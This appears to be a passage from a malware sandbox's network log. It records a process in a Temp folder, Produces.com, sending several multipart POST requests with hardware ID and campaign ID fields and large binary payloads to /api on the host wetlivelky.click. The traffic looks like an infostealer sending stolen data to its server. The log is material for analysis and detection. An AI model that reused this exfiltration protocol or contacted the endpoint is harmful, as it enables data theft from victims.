                                                                                            2024-12-27 09:11:45 UTC1369INData Raw: 34 32 75 6e 56 78 4f 56 76 4e 53 44 58 41 50 61 48 79 2b 77 62 6c 56 6d 7a 61 63 77 78 66 49 53 45 48 41 7a 4c 78 77 4c 4c 30 37 69 2f 6e 4b 4a 52 6c 57 36 6c 49 4e 47 77 45 68 61 65 57 49 37 78 2b 49 49 38 37 36 57 70 35 54 52 71 61 79 72 6d 55 6f 74 43 79 61 2f 34 68 43 51 52 7a 69 41 6c 49 31 54 6d 67 67 76 70 2b 35 53 73 74 71 7a 73 45 46 6e 68 4e 57 72 4b 6e 4f 4e 58 48 71 65 5a 4f 67 33 43 56 42 56 72 31 41 47 32 4a 54 61 44 61 2b 33 76 6f 41 69 69 4b 4e 30 78 65 5a 64 54 6a 5a 36 4a 5a 67 4d 61 73 56 73 75 6e 66 61 46 45 42 39 46 35 41 49 55 38 6d 61 65 6a 5a 74 31 4b 58 5a 4e 62 38 56 4a 59 4c 4f 62 43 79 67 79 5a 2b 2b 68 36 50 34 4d 74 69 51 51 65 6f 4e 55 38 76 52 7a 39 2f 76 74 65 35 46 4e 68 38 33 6f 74 55 32 6c 70 47 70 71 4c 4a 50 58 50 70
                                                                                            Data Ascii: 42unVxOVvNSDXAPaHy+wblVmzacwxfISEHAzLxwLL07i/nKJRlW6lINGwEhaeWI7x+II876Wp5TRqayrmUotCya/4hCQRziAlI1Tmggvp+5SstqzsEFnhNWrKnONXHqeZOg3CVBVr1AG2JTaDa+3voAiiKN0xeZdTjZ6JZgMasVsunfaFEB9F5AIU8maejZt1KXZNb8VJYLObCygyZ++h6P4MtiQQeoNU8vRz9/vte5FNh83otU2lpGpqLJPXPp
                                                                                            2024-12-27 09:11:45 UTC1369INData Raw: 4a 71 61 53 6a 77 45 56 73 73 52 6a 35 2f 76 74 65 35 48 64 68 38 74 34 56 63 6e 6e 52 49 76 75 72 62 50 6d 61 50 4b 49 4c 67 77 6e 4e 47 57 38 49 63 55 69 4e 58 4f 48 6e 78 32 62 64 53 6e 6d 54 57 6c 31 71 65 54 78 65 2b 71 73 73 30 66 65 39 34 32 37 36 58 65 68 6b 50 70 51 51 56 65 68 4e 6d 4c 75 7a 5a 6f 56 4c 66 4a 35 7a 58 45 74 31 64 42 62 6e 4d 70 55 45 6f 76 53 71 61 2f 74 4a 71 47 44 6a 54 4d 32 73 63 56 43 74 67 38 4a 37 76 41 39 68 71 7a 73 70 55 68 6e 4a 47 74 72 4b 6b 4b 47 61 69 61 39 53 75 38 47 5a 5a 47 4f 49 45 52 47 39 6d 4a 6d 6e 2f 6a 2b 6b 46 6c 32 75 67 38 7a 57 65 42 55 62 34 73 73 4d 30 61 50 6f 76 6e 61 36 64 4e 51 56 4e 73 45 45 43 63 68 4d 33 49 4f 66 5a 37 31 4c 41 64 73 43 46 42 70 34 54 52 72 6e 78 69 58 51 67 75 54 32 50 71
                                                                                            Data Ascii: JqaSjwEVssRj5/vte5Hdh8t4VcnnRIvurbPmaPKILgwnNGW8IcUiNXOHnx2bdSnmTWl1qeTxe+qss0fe94276XehkPpQQVehNmLuzZoVLfJ5zXEt1dBbnMpUEovSqa/tJqGDjTM2scVCtg8J7vA9hqzspUhnJGtrKkKGaia9Su8GZZGOIERG9mJmn/j+kFl2ug8zWeBUb4ssM0aPovna6dNQVNsEECchM3IOfZ71LAdsCFBp4TRrnxiXQguT2Pq


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.449741104.21.25.414436636C:\Users\user\AppData\Local\Temp\174436\Produces.com
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-27 09:11:46 UTC274OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=3GRJ7LHDSC
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 18115
                                                                                            Host: wetlivelky.click
                                                                                            2024-12-27 09:11:46 UTC15331OUTData Raw: 2d 2d 33 47 52 4a 37 4c 48 44 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 31 32 34 35 41 44 30 42 46 39 37 37 46 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 33 47 52 4a 37 4c 48 44 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 47 52 4a 37 4c 48 44 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 58 47 44 52 2d 2d 4c 69 6c 6c 79 4c 0d 0a 2d 2d 33 47 52 4a 37 4c 48 44 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                            Data Ascii: --3GRJ7LHDSCContent-Disposition: form-data; name="hwid"31245AD0BF977FF1BEBA0C6A975F1733--3GRJ7LHDSCContent-Disposition: form-data; name="pid"2--3GRJ7LHDSCContent-Disposition: form-data; name="lid"VXGDR--LillyL--3GRJ7LHDSCContent-
                                                                                            2024-12-27 09:11:46 UTC2784OUTData Raw: c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f
                                                                                            Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_
                                                                                            2024-12-27 09:11:47 UTC1136INHTTP/1.1 200 OK
                                                                                            Date: Fri, 27 Dec 2024 09:11:47 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=tgdnq6c2hdnhah199ta520fjre; expires=Tue, 22 Apr 2025 02:58:26 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RNFZTfN2uv%2FAc%2B%2FfLE35B1k%2FxxTu9pWWr4PemY9VJ6snzwksADt36QQKOhhXGdoyuyq%2F0ecrwIkXaCjQWRcQfewnr%2Fk%2BvSFeFVJm0COKt6Dwy%2BdOYAAONtiQQiVOcIINzP2x"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8f882f656a1343b1-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1558&rtt_var=598&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2840&recv_bytes=19069&delivery_rate=1809169&cwnd=195&unsent_bytes=0&cid=4688acf27fc018b1&ts=1076&x=0"
                                                                                            2024-12-27 09:11:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2024-12-27 09:11:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.449742104.21.25.414436636C:\Users\user\AppData\Local\Temp\174436\Produces.com
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-27 09:11:48 UTC272OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=VQCPK4875
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8730
                                                                                            Host: wetlivelky.click
                                                                                            2024-12-27 09:11:48 UTC8730OUTData Raw: 2d 2d 56 51 43 50 4b 34 38 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 31 32 34 35 41 44 30 42 46 39 37 37 46 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 56 51 43 50 4b 34 38 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 51 43 50 4b 34 38 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 58 47 44 52 2d 2d 4c 69 6c 6c 79 4c 0d 0a 2d 2d 56 51 43 50 4b 34 38 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                            Data Ascii: --VQCPK4875Content-Disposition: form-data; name="hwid"31245AD0BF977FF1BEBA0C6A975F1733--VQCPK4875Content-Disposition: form-data; name="pid"2--VQCPK4875Content-Disposition: form-data; name="lid"VXGDR--LillyL--VQCPK4875Content-Disp
                                                                                            2024-12-27 09:11:52 UTC1136INHTTP/1.1 200 OK
                                                                                            Date: Fri, 27 Dec 2024 09:11:52 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=shf2i96th8j2tkc63iqh7uemhg; expires=Tue, 22 Apr 2025 02:58:31 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iUPeA2zP%2FFXSKDq%2Bum%2BPKE07PqxIYZdaon2D47bZdytDEDU7masRxjmUpziXBJKuaxR1OdJc%2BUK%2BwqKIMFamt%2B6%2BE8qZrCOtMNIsm0M%2FguBGdujZ3zRJidC1rL%2BDtWH9Pk9N"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8f882f73be6a42d2-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1562&rtt_var=603&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9660&delivery_rate=1787025&cwnd=227&unsent_bytes=0&cid=e2076d0d7ae7a507&ts=4047&x=0"
                                                                                            2024-12-27 09:11:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2024-12-27 09:11:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.449743104.21.25.414436636C:\Users\user\AppData\Local\Temp\174436\Produces.com
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-27 09:11:54 UTC278OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=CKT12CXR99MRRE
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 20413
                                                                                            Host: wetlivelky.click
                                                                                            2024-12-27 09:11:54 UTC15331OUTData Raw: 2d 2d 43 4b 54 31 32 43 58 52 39 39 4d 52 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 31 32 34 35 41 44 30 42 46 39 37 37 46 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 43 4b 54 31 32 43 58 52 39 39 4d 52 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 4b 54 31 32 43 58 52 39 39 4d 52 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 58 47 44 52 2d 2d 4c 69 6c 6c 79 4c 0d 0a 2d 2d 43 4b 54 31 32 43 58 52
                                                                                            Data Ascii: --CKT12CXR99MRREContent-Disposition: form-data; name="hwid"31245AD0BF977FF1BEBA0C6A975F1733--CKT12CXR99MRREContent-Disposition: form-data; name="pid"3--CKT12CXR99MRREContent-Disposition: form-data; name="lid"VXGDR--LillyL--CKT12CXR
                                                                                            2024-12-27 09:11:54 UTC5082OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                            2024-12-27 09:11:55 UTC1128INHTTP/1.1 200 OK
                                                                                            Date: Fri, 27 Dec 2024 09:11:55 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=35cqljecrc1aq30aqi1p5h3ute; expires=Tue, 22 Apr 2025 02:58:33 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SeuTFBcUyOUdWUHw049go53kpnjPy6IOinngfJhwc4b4Ee0JAWWsrUwbPY8KX17mAu6M%2F2TdVbLbrGSwD6Jq0nSKSDBjJ%2BwAiFsANuPlR%2BpGC6lhWyDqmBvYwO%2FtcHp1pgtN"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8f882f956ed441a6-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2287&min_rtt=2281&rtt_var=868&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21371&delivery_rate=1252681&cwnd=239&unsent_bytes=0&cid=e167a37416d75061&ts=1004&x=0"
                                                                                            2024-12-27 09:11:55 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2024-12-27 09:11:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.449745104.21.25.414436636C:\Users\user\AppData\Local\Temp\174436\Produces.com
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-27 09:11:56 UTC279OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=KOZIYHDO9U8A1TEZ
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 1234
                                                                                            Host: wetlivelky.click
                                                                                            2024-12-27 09:11:56 UTC1234OUTData Raw: 2d 2d 4b 4f 5a 49 59 48 44 4f 39 55 38 41 31 54 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 31 32 34 35 41 44 30 42 46 39 37 37 46 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4b 4f 5a 49 59 48 44 4f 39 55 38 41 31 54 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 4f 5a 49 59 48 44 4f 39 55 38 41 31 54 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 58 47 44 52 2d 2d 4c 69 6c 6c 79 4c 0d 0a 2d 2d 4b 4f
                                                                                            Data Ascii: --KOZIYHDO9U8A1TEZContent-Disposition: form-data; name="hwid"31245AD0BF977FF1BEBA0C6A975F1733--KOZIYHDO9U8A1TEZContent-Disposition: form-data; name="pid"1--KOZIYHDO9U8A1TEZContent-Disposition: form-data; name="lid"VXGDR--LillyL--KO
                                                                                            2024-12-27 09:11:57 UTC1118INHTTP/1.1 200 OK
                                                                                            Date: Fri, 27 Dec 2024 09:11:57 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=e8fui0qehrggu9rk1sbr5palvl; expires=Tue, 22 Apr 2025 02:58:36 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aoI3%2B5JpZsfJJXa1RKOYwVu6cBMbuUyREEg9qi4XRd4GElo4qmkq3dpuPurFMyxBZ5FypTgpT2MO2Drsk7sGuGZMzyQgOyvdONAqGxELOT1d031ERH2FS9ecYrzrCxWnIhnc"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8f882fa42b8142a0-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2021&min_rtt=2017&rtt_var=766&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2149&delivery_rate=1420924&cwnd=225&unsent_bytes=0&cid=5ce1d7f81f387a1d&ts=803&x=0"
                                                                                            2024-12-27 09:11:57 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2024-12-27 09:11:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.449747104.21.25.414436636C:\Users\user\AppData\Local\Temp\174436\Produces.com
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-27 09:11:59 UTC275OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=J5KIXPMO1M
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 591733
                                                                                            Host: wetlivelky.click
                                                                                            2024-12-27 09:11:59 UTC15331OUTData Raw: 2d 2d 4a 35 4b 49 58 50 4d 4f 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 31 32 34 35 41 44 30 42 46 39 37 37 46 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4a 35 4b 49 58 50 4d 4f 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 35 4b 49 58 50 4d 4f 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 58 47 44 52 2d 2d 4c 69 6c 6c 79 4c 0d 0a 2d 2d 4a 35 4b 49 58 50 4d 4f 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                            Data Ascii: --J5KIXPMO1MContent-Disposition: form-data; name="hwid"31245AD0BF977FF1BEBA0C6A975F1733--J5KIXPMO1MContent-Disposition: form-data; name="pid"1--J5KIXPMO1MContent-Disposition: form-data; name="lid"VXGDR--LillyL--J5KIXPMO1MContent-
                                                                                            2024-12-27 09:11:59 UTC15331OUTData Raw: bf b6 6a d6 bb ab 73 d8 16 19 15 55 c9 db 26 b3 dc 9c 26 ba f5 8a 9a 54 e2 a0 bd 4f e8 62 96 2a 36 a2 22 fe 38 13 78 1f 84 ca 2e d5 cc 94 5e e3 c7 0d 0c 6e e5 15 12 1f c3 5e ea 84 81 12 a5 4a 04 fd 79 7a a3 a1 36 66 e8 c8 d9 49 ed f0 bf 3e ee 13 b5 c1 dc 6e e9 27 38 f3 3f 2f 3c 38 b5 66 3e 23 d3 55 f5 20 5b 1d cd 9e 56 37 65 bf 7f 9f 0a d1 77 98 0a d9 d0 57 cd 3b d8 54 3d 51 0d 4a 92 f6 84 14 de 9d 69 e9 e2 3c 93 5f 81 1b e4 ef 81 b6 a0 ea e8 de 84 d3 9c 1d b3 85 26 61 ee 87 52 f6 e2 a6 19 43 2e 6e 3e ca 5d ab bc 21 bc 0d e7 f3 d7 d7 6b 0e 52 cf b3 d3 e7 7d 62 84 01 d0 8b a0 5a a3 52 68 96 45 62 f4 9f e2 dd ab 27 fd 96 bf 84 e7 80 1e 61 df db ba 4f 40 4f 35 60 07 ef 5e 4f 3e f8 c9 75 35 a5 2c b0 d3 4d 85 ef 3e 1b 75 9a 6d 36 b7 b9 ce 3b 49 91 25 53 61 2f
                                                                                            Data Ascii: jsU&&TOb*6"8x.^n^Jyz6fI>n'8?/<8f>#U [V7ewW;T=QJi<_&aRC.n>]!kR}bZRhEb'aO@O5`^O>u5,M>um6;I%Sa/
                                                                                            2024-12-27 09:11:59 UTC15331OUTData Raw: ed 3d 24 e1 c7 30 76 41 bd a6 25 b9 37 5e 51 6c 14 d8 93 9a 5e 36 42 c1 f3 a3 71 1c a0 f8 a9 18 ec cf 9b 29 ed be f1 e4 30 41 25 20 bd 8b 29 37 9b ad 63 e9 5c 67 6d 84 12 f5 b2 78 1e cd c1 20 d8 4d 59 1b ca 7b a1 10 4d 1f da 02 8b 1e 87 cc 2e 36 48 0a ea ba 9d 7f af 74 c1 6f 5f a4 90 da eb 54 1a e1 3b 2d 33 03 4e e0 f3 85 a0 93 17 55 7f df 61 2b 09 22 99 84 41 74 93 dd e5 3c ce 15 31 6c 66 2b cc 2f f6 7a 3d 09 e0 9b b4 be b3 d9 fd 55 40 b9 a6 12 ab b9 e6 d5 f5 34 d4 ce 65 63 e0 31 ac cc e9 36 83 6e 9d 46 cc ef e5 71 1a 6d 85 a8 fb 30 27 25 cf 93 3a 18 91 5e bc 31 84 e7 11 df 78 44 5d 21 de 87 0e 95 e2 ec f3 0c e0 f8 bd f9 87 40 f9 bf c8 c0 d8 9c 2f 8e da fb a2 eb 87 b7 4b 6f 4a 47 85 fb 4e 5d 03 66 22 32 cb 8d 05 39 17 73 5d ec 61 4e d6 46 58 07 47 fb 03
                                                                                            Data Ascii: =$0vA%7^Ql^6Bq)0A% )7c\gmx MY{M.6Hto_T;-3NUa+"At<1lf+/z=U@4ec16nFqm0'%:^1xD]!@/KoJGN]f"29s]aNFXG
                                                                                            2024-12-27 09:11:59 UTC15331OUTData Raw: f1 45 07 dd c3 30 56 47 9a ef 6f 98 24 1a 83 95 94 8b ac 3f 7a 06 fd c7 52 87 66 9e 87 af 40 39 c8 e0 8b 0e c4 ae c4 ed ea 23 77 5f 35 df b2 36 7e c4 b0 e9 08 f2 00 82 90 73 cf 39 bb 02 c5 df 9d 55 4b 83 b5 2a 05 9c d3 03 42 64 5f ce 51 f6 18 0a 84 67 b7 d4 4a 64 5c fe 2f 7e 7f dc b9 e1 23 7d e1 cb 27 ef 0b 16 9d 03 5b 6c e6 05 cf d7 dc 1d 08 a0 04 78 6d 55 ee c1 56 77 5f b0 3f 1f 55 2d aa 5d 2a 00 0e 25 10 d9 90 eb bc b4 89 db 42 a9 fc 36 91 52 59 90 c7 22 fa d5 dd 89 8a 17 4e a9 f0 bd bd 09 3c e7 cb 4c 88 a6 80 b4 65 18 d9 cf 0d 6f a6 d0 37 22 ef 70 4e 42 bc 09 f0 c8 a5 0c 80 fc 4e 10 bf 9b f9 72 79 f4 3c 41 f4 39 c3 40 4f 5d f2 3e a4 b6 8e 00 9a 01 1e 50 88 8b 65 b5 0d b0 9a bc e0 53 10 21 f7 69 51 09 4f 7a 4a e1 e9 3a fa 4f f5 2f cc 9d 95 82 00 ea f1
